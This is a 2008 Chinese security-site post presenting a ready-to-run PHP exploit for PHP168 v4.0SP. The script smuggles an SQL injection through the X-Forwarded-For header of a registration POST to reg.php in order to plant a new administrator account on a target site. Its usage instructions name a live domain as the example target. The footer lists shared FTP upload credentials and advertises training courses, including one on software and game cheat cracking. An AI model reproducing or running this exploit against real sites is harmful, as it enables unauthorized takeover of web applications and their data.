安全中国首页 > 新闻中心 > 网站程序漏洞
 

PHP168 X-Forwarded-For的漏洞利用

更新时间:2008-5-23 0:45:21
责任编辑:果果龙
热 点:
漏洞本身的成因没什么好说的,老掉牙的x-forwarded-for的问题,我想这个漏洞很多人都找到了。因为这个漏洞也有些时间了,当时只是在pc上测试了一下,可能有些错误,有兴趣的同学可以自己研究一下。 
<?php
print_r("
+------------------------------------------------------------------+
Create New Admin Exploit For php168 v4.0SP\n
amxku.net
+------------------------------------------------------------------+
");
if ($argc<4) {
 echo "Usage: php ".$argv[0]." host path uid\n";
 echo "host: target server \n";
 echo "path: path to php168\n";
 echo "uid: the user uid\n";
 echo "Example:";
 echo "php ".$argv[0]." www.php168.com / 123345\n";
 die;
}
$host=$argv[1];
$path=$argv[2];
$id=$argv[3]+2;
$cmd = "xxxx’,’0’,’111’,’0’,’1’,’’, ’’, ’123’, ’123’, ’123’, ’123’, ’0’, ’’, ’0’, ’’, ’’, ’’, ’’),(’".$id."’, ’0’, ’3’, ’’, ’1’, ’0’, ’’, ’1’, ’1’, ’1’, ’1’, ’1’, ’1’, ’1’, ’’, ’’, ’1’, ’1’, ’1’, ’1’, ’0’, ’’, ’0’, ’’, ’’, ’’, ’’)/*";
$content_1= "username=amxku&email=amxku@msn.com&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2";
$content_2= "username=amxku&email=amxku@msn.com&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2";
senddate($content_1);
senddate($content_2);
function senddate($content){
global $path,$host,$cmd;
$data = "POST ".$path."reg.php"." HTTP/1.1";
$data .= "Accept: */*";
$data .= "Accept-Language: zh-cn";
$data .= "Content-Type: application/x-www-form-urlencoded";
$data .= "User-Agent: Mozilla/4.0";
$data .= "Host: ".$host."";
$data .= "x-forwarded-for: ".$cmd."";
$data .= "Content-length: ".strlen($content)."";
$data .= "Connection: Keep-Alive";
$data .= "";
$data .= $content."";
$sendto=fsockopen($host,80);
if (!$sendto) {
 echo ’No response from ’.$host;
 die;
}
fputs($sendto,$data);
fclose($sendto);
};
echo "Create a successful administrator\n amxku.net";
?>

 
安全中国网友投稿专用上传FTP空间:
Ftp服务器:download.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
 
学习软件编程开发技术,推荐加入以下软件编程培训班:
易语言软件编程培训班(简单易学)  Delphi软件编程培训班  VC++软件编程培训班
VB软件编程培训班  JAVA高端编程就业研发班

学习网站开发制作技术,推荐加入以下网站开发培训班:
ASP.net网站开发项目实战班  ASP语言网站建设培训班

学习网络安全入侵防护技术,推荐加入以下技术培训班:
大型网络安全入侵防护班  网站脚本程序全方位安全检测班

学习网络管理、网吧运营维护技术(网管),推荐加入以下培训班:
大型网吧技术管理人才特训班  Linux网络嵌入架构工程师培训班

学习专项特殊技术,推荐加入以下专项技术培训班:
软件与游戏外挂脱壳破解班(逆向工程)  赚钱王道-网赚技能培训班  Flash动画设计师就业特训班